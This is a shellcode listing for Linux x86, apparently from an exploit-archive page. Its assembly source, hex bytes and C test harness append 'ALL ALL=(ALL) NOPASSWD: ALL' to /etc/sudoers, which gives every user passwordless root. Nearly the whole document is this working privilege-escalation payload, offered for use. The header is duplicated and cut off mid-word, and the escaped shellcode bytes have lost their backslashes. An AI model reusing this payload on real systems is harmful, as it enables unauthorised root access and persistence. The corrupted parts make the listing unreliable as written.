/*
Title: Edit /etc/sudoers with NOPASSWD for ALL
Date: 2018-04-19
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: edit /etc/sudoe /*
Title: Edit /etc/sudoers with NOPASSWD for ALL
Date: 2018-04-19
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: edit /etc/sudoers with ALL ALL=(ALL) NOPASSWD: ALL
Tested On: Ubuntu 14.04
Arch: x86
Size: 79 bytes
Shellcode is register independent and null free.
global _start
section .text
_start:
xor edx, edx ; clear edx
xor ecx, ecx ; clear ecx
push edx ; terminating NULL
push 0x7372656f ; "sreo"
push 0x6475732f ; "dus/"
push 0x6374652f ; "cte/"
mov ebx, esp ; point ebx to stack
inc ecx ; ecx to 1
mov ch, 0x4 ; ecx to 401 O_WRONLY | O_APPEND
push 0x5 ; open()
pop eax
int 0x80 ; execute open
xchg ebx, eax ; save fd in ebx
jmp short setup
;write(fd, ALL ALL=(ALL) NOPASSWD: ALL
, len);
write:
pop ecx ; pop "ALL ALL=(ALL) NOPASSWD: ALL"
mov dl, 0x1c ; len 28
push 0x4 ; write()
pop eax
int 0x80 ; execute write
push 0x1 ; exit ()
pop eax
int 0x80
setup:
call write
db "ALL ALL=(ALL) NOPASSWD: ALL" , 0xa
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] =
"x31xd2x31xc9x52x68x6fx65x72x73x68x2fx73x75x64x68x2fx65x74x63x89xe3x41xb5x04x6ax05x58xcdx80x93xebx0dx59xb2x1cx6ax04x58xcdx80x6ax01x58xcdx80xe8xeexffxffxffx41x4cx4cx20x41x4cx4cx3dx28x41x4cx4cx29x20x4ex4fx50x41x53x53x57x44x3ax20x41x4cx4cx0a";
main()
{
printf("Shellcode Length: %d
", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Linux x86 Edit etc sudoers With NOPASSWD For ALL Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 405